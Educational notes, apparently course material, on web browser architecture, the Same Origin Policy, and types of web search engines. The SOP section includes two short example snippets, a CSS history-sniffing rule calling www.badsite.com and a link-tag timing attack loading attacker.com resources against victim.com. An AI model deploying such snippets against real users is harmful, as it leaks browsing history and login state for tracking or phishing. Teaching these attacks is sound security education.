Web Browser
The web browser is a program that retrieves documents from remote servers and displays them on the screen. It allows that particular resources could be requested explicitly by URI, or implicitly by following embedded hyperlinks.
The visual appearance of a web page encoded using HTML language is improved using other technologies.
The first one is the Cascading Style Sheets (CSS) that allow adding layout and style information to the web pages without complicating the original structural mark-up language.
The second one is JavaScript (now standardized as ECMAScript scripting language [1]), which is a host environment for performing client-side computations. It is embedded within HTML documents and the corresponding displayed page is the result of evaluating the JavaScript code and of applying it to the static HTML constructs.
The last one is the using of plugins[2], small extensions that are loaded by the browser and used to display some types of content that the web browser cannot display directly, such as Macromedia Flash animations and Java Applets.
[1] ECMA International is an industry association founded in 1961 and dedicated to the standardization of Information and Communication Technology (ICT) and Consumer Electronics (CE).
[2] A plug-in (also called plugin, addin, add-in, addon, add-on, snap-in, snapin) is a small software computer program that extends the capabilities of a larger program. Plugins are commonly used in web browsers to enable them to play sounds, video clips, or automatically decompressing files.
A REFERENCE ARCHITECTURE FOR WEB BROWSERS
5. The JavaScript Interpreter evaluates JavaScript code which may be embedded in web pages. JavaScript is an object-oriented scripting language developed by Brendan Eich for Netscape in 1995. Certain JavaScript functionalities, such as the opening of pop-up windows, may be disabled by the Browser Engine or Rendering Engine for security purposes. In the following table we can see examples of JavaScript Interpreter.
[3] MIME was originally intended for use with e-mail attachments, in fact MIME stands for Multimedia Internet Mail Extensions. Unix systems made use of a .mailcap file, which was a table associating MIME types with application programs. Early browsers made use of this capability, now substituted by their own MIME configuration tables.
6. The XML Parser subsystem parses XML documents into a Document Object Model (DOM) tree.
7. The Display Backend subsystem provides drawing and windowing primitives, a set of user interface widgets, and a set of fonts. It may be tied closely with the operating system.
8. The Data Persistence subsystem stores various data associated with the browsing session on disk. These may be high-level data such as bookmarks or toolbars settings, or they may be low-level data such as cookies, security certificates, or caches.
WEB BROWSER: THE NEW OS
In the following table we can see a comparison between a classical OS and the Internet Browser.
Browser Same Origin Policy (SOP)
Two pages have the same origin if the protocol, port (if one is specified), and host are the same for both pages.
Examples:
http://www.AWebSite.com:80/Page1.html
The SOP is identified by (http, AWebSite.com, 80).
https://www.AWebSite.com/Page1.html
While in this case the SOP is identified by (https, AWebSite.com, ).
The interaction between sites of different domains is regulated by the SOP. Every browser implements this policy which means:
- on the client side: cookies from origin (document.domain) A are not visible to origin B; scripts from origin A cannot read or set properties for origin B using DOM interface.
- on server side: SOP allows “send-only” communication to remote site.
Setting document.domain of a web page changes the origin of the page in fact this property sets or returns the domain name of the server from which the document is originated.
Some Same Origin Policy (SOP) Violations
1) Tracking users by querying user’s history file.
<style> a#visited {background: url (www.badsite.com/trackuser.php?bank.com); } </style> <a href=”http://www.bank.com/” > Hi! </a>
The application of this type of violation could be:
- Spear phishing;
- Marketing;
- Use browsing history as second factor authentication.
2) Cross-site Timing attacks.
The response time depends on private user state, for example:
- If the user is logged or not;
- From number of elements in shopping cart;
- So on…
In general all web sites leak information by timing.
A link tag can be used to leak timing information based on the fact that a Browser stops parsing until link is resolved.
<head> <link rel=“stylesheet” href=“attacker.com/img1.gif”> <link rel="stylesheet“ href=“victim.com/login.html" /> <img rel=“stylesheet” href=“attacker.com/img2.gif> </head>
Attacker learns how long it took to load victim/login.html.
REFERENCES
[01] Alan Grosskurth, Michael W. Godfrey, Architecture and evolution of the modern web browser, David R. Cheriton School of Computer Science, University of Waterloo, Waterloo, 2006;
[02] Iris Lai, Jared Haines Johm, Chun-Hung, Chiu Josh Fairhead, Conceptual Architecture of Mozilla Firefox (version 2.0.0.3), SEng 422 Assignment 1 Dr. Ahmed E. Hassan, 2007;
[03] Nicchi A., Web Applications: technologies and models, Edizioni Accademiche Italiane, 2014;
[04] Charles Reis, Steven D. Gribble, Isolating Web Programs in Modern Browser Architectures, University of Washington, 2009;
[05] Stanford Advanced Computer Security Certificate Program, Browser Security Model and SOAP Violations, 2007.
Web Search Engines
As we can see on [2] “The Indexed Web contains at least 2.02 billion pages (Saturday, 05 July, 2014)”.
As a consequence we need to use a service of a web search engine if we want to find something of interest on the Web or answers to some questions .
For this reason search engines are generally used as “Internet users' entry point to the digital world” [1] to make their searches (according to ComScore [3] searches are defined as “user engagement with a search service with the intent to retrieve search results.”).
In the following figure we can see an outlook of web search scenario in relation to the huge quantity of web pages.
We have many types of web search engines working on indexed pages:
- GENERAL SEARCH ENGINE like Google, Bing and Yahoo;
- COMPUTATIONAL KNOWLEDGE ENGINE like www.wolframalpha.com;
- ANSWER SEARCH ENGINE like www.chacha.com;
- IMAGE SEARCH ENGINE like www.picsearch.com;
- VIDEO SEARCH ENGINE like on.aol.com;
- TORRENT SEARCH ENGINE like www.ktorrents.com;
- PERSON SEARCH ENGINE like www.spokeo.com;
- EMAIL SEARCH ENGINE like www.emailsherlock.com;
- BUSINESS SEARCH ENGINE like www.business.com;
- BLOG AND FORUM SEARCH ENGINE like omgili.com;
- META-SEARCH ENGINE like www.dogpile.com.
As we have many search services, the web search is still dominated by Google, Microsoft and Yahoo. The following figure gives a clear idea even if it's referred to 2012. The graph in the figure is based on 200 billion searches done in the United States in 2012 [1].
The next step for the web search engines will be the semantic search because people are going to commuicate with them in a way that's much more natural to their thinking. So the web search engines should try to understand the meaning and, in relation to it, should give the more appropriate and pertinent answer.
REFERENCES
- The Global Edition of the New York Times. Friday, April 5, 2013 page 15. “Web Searches that try to read your mind”;
- http://www.worldwidewebsize.com/;
- http://www.comscore.com/: Analytics for a Digital World™.